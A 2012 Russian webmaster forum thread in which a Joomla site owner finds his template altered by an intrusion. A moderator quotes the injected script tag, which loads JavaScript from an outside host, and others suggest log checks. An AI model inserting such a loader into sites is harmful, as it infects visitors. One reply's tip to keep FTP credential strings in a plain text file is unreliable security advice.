1. Уважаемые пользователи, прежде чем ответить в теме или создать новую,
    внимательно ознакомьтесь с правилами раздела

    Кому лень работать или руки не оттуда - пользуйтесь услугами специалистов
  2. Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.."

    Есть JED!!! Ищите там!!!

Помощь Неожиданно изменились файлы шаблона на сервере

Тема в разделе "Joomla", создана пользователем Sergo_Sev, 24 мар 2012.

Информация :
  • Уважаемые пользователи, прежде чем ответить в теме или создать новую, внимательно ознакомьтесь с правилами раздела
  • Не задавайте глупых вопросов "Посоветуйте какой-нибудь компонент.." Есть JED!!! Ищите там!!!
  • Аналоги ищите там же - на JED!!!
  • Новая версия? - У кого будет - тот выложит!
Статус темы:
Закрыта.
Модераторы: arman29, DMS, NightHunter
  1. Sergo_Sev

    Sergo_Sev Творец

    Регистр.:
    14 июн 2008
    Сообщения:
    571
    Симпатии:
    187
    Захожу сегодня на сайт - пропал счетчик liveinternet, посмотрел исходный код - что то не то...
    Решил проверить файлы шаблона (gk party freak) - увидел, что дата изменения вчерашняя, сравнил с оригиналом и озадачился
     

    Вложения:

    • default.rar
      Размер файла:
      4,7 КБ
      Просмотров:
      4
  2. latteo

    latteo Эффективное использование PHP, MySQL

    Moderator
    Регистр.:
    28 фев 2008
    Сообщения:
    1.546
    Симпатии:
    1.418
    Ломанули тебя внизу шаблона есть вставка
    HTML:
    <script type="text/javascript" src='http://keywork.keycf.net/bob/js/mootols.js'></script>
     
  3. Sergo_Sev

    Sergo_Sev Творец

    Регистр.:
    14 июн 2008
    Сообщения:
    571
    Симпатии:
    187
    А как найти через что ломанули?
    У меня VPS
     
  4. Tippmann

    Tippmann Создатель

    Регистр.:
    17 фев 2010
    Сообщения:
    35
    Симпатии:
    15
    Тебе необходимо через админпанель хостинга (если таковая есть) зайти в раздел Лог HTTP доступа и(или) поискать в Лог FTP доступа. Посмотреть с какого IP и что делали на ту дату и время.

    У меня было подобное. Украли параметры доступа к FTP из Total Commander'a. В связи с этим перешёл на FileZilla.

    Затем ломанули ещё раз. Через один из незаурядных компонетов Joomla. Проверил по логам - с одного IP часто шли запросы на наличие различных компанентов. Я забанил этот IP.

    Вывод: ко всем мерам безопасности нужно добавить мониторинг логов.
     
  5. krobol

    krobol

    Регистр.:
    6 июн 2008
    Сообщения:
    455
    Симпатии:
    126
    FileZilla точно также отдаёт пароли, так что в фтп-клиенте их лучше не хранить, а каждый раз вводить заново.
     
  6. Tippmann

    Tippmann Создатель

    Регистр.:
    17 фев 2010
    Сообщения:
    35
    Симпатии:
    15
    блин! а я думал FileZilla это понадёжнее. Дело в том что я использую очень сложные пароли, и каждый раз их вводить не удобно. может кто посоветует альтернативу FileZilla или как её защитить. Сорри за офтоп, но думаю топикстартеру эта инфа тоже пригодится.
     
  7. krobol

    krobol

    Регистр.:
    6 июн 2008
    Сообщения:
    455
    Симпатии:
    126
    Как вариант:
    сохраняешь все пароли в текстовом файле (на каждый ресурс свой пароль!, что соответствует требованиям правил безопасности)
    когда нужно ввести логин и пароль, то открываешь файл и там выделяешь то, что нужно Ctrl+Insert, потом вставляешь Shift+Insert.
    Для filezilla можно в текстовом файле прописать сразу строку в таком формате:
    Код:
    ftp://username:password@domen.com
    Вставляешь её в поле "Хост" и всё.
    Текстовый файл назвать как-нибудь нейтрально.
     
  8. dmx

    dmx

    Регистр.:
    22 июн 2011
    Сообщения:
    681
    Симпатии:
    582
    Типа как Гризон ссылки в /txt хранит .
     
  9. Genk0

    Genk0

    Регистр.:
    2 июн 2010
    Сообщения:
    10
    Симпатии:
    10
    Была у нас где то прекрасная тема по поводу где и как хранить пароли.
    Проблему решили? тему закрываем?? и не флудим не по теме!
    Я пользуюсь KeePass на флэхе таскаю файл ключей
     
  10. Sergo_Sev

    Sergo_Sev Творец

    Регистр.:
    14 июн 2008
    Сообщения:
    571
    Симпатии:
    187
    Проблема решена - заменил измененные файлы из бэкапа. Взломали возможно перебором паролей от FTP т.к. пароль был из 6 символов
     
Статус темы:
Закрыта.